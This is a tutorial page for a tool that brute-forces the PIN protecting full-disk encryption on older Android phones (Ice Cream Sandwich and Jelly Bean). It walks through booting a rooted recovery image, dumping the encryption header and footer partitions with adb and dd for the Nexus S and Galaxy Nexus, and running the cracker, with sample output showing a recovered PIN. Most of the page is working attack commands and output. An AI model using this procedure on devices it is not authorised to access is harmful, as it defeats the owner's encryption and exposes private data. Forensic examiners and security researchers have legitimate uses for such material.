Android BruteForce Encryption


Android BruteForce Encryption is use for cracking the pin used to encrypt an Android device (Ice Cream Sandwich and Jelly Bean) using brute force.



android-bruteforce-encryption  [header file] [footer file] (max PIN digits)


Boot to a recovery image

Next, we’ll boot the device from a rooted recovery image. For this guide, we used Clockwork Mod but you can use any device compatible recovery image with root and adb enabled.

Pull the required header and footer files

Your devices should be sitting in recovery mode now. Next, we are going to pull the needed header and footer data so we can brute force the encryption pin. The location varies by device so choose the steps for your particular device type.

Nexus S


cyborg@cyborg:~$ sudo adb shell dd if=/dev/block/mmcblk0p2 of=tmp_header bs=512 count=1
cyborg@cyborg:~$ sudo adb pull tmp_header ~/Desktop/tmp_header



cyborg@cyborg:~$ sudo adb shell mkdir /efs adb shell mount -t yaffs2 /dev/block/mtdblock6 /efs
cyborg@cyborg:~$ sudo adb pull /efs/userdata_footer ~/Desktop/tmp_footer


Galaxy Nexus


cyborg@cyborg:~$ sudo adb shell dd if=/dev/block/mmcblk0p12 of=tmp_header bs=512 count=1
cyborg@cyborg:~$ sudo adb pull tmp_header ~/Desktop/tmp_header



cyborg@cyborg:~$ sudo adb shell dd if=/dev/block/mmcblk0p13 of=tmp_footer
cyborg@cyborg:~$ sudo adb pull tmp_footer ~/Desktop/tmp_footer

Run the Android BruteForce Encryption program:

We now have everything thing we need so we’ll run the Android Brute Force Encryption cracking program against the header and footer files. By default, we test 4-digit numeric passcodes but you can change the number of digits to test.

cyborg@cyborg:~$ sudo android-bruteforce-encryption ~/Desktop/tmp_header ~/Desktop/tmp_footer

Android BruteForce Encryption  program will output information about the footer file and then brute force the password:

Defaulting max PIN digits to 4
Footer File    : /home/santoku/Desktop/tmp_footer
Magic          : 0xD0B5B1C4
Major Version  : 1
Minor Version  : 0
Footer Size    : 104 bytes
Flags          : 0x00000000
Key Size       : 128 bits
Failed Decrypts: 0
Crypto Type    : aes-cbc-essiv:sha256
Encrypted Key  : 0xE51861649D0005F874AD6CCAB6DF2C61
Salt           : 0xA163525990AC7A053E1E372914999BE8
Android BruteForce Encryption  Trying to Bruteforce Password... please wait
Trying: 0000
Trying: 0001
Trying: 0002
Trying: 0003

Trying: 6426
Trying: 6427
Trying: 6428
Found PIN!: 6428

Leave a reply


We're are building as a community and a team. Be a part of it.


©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?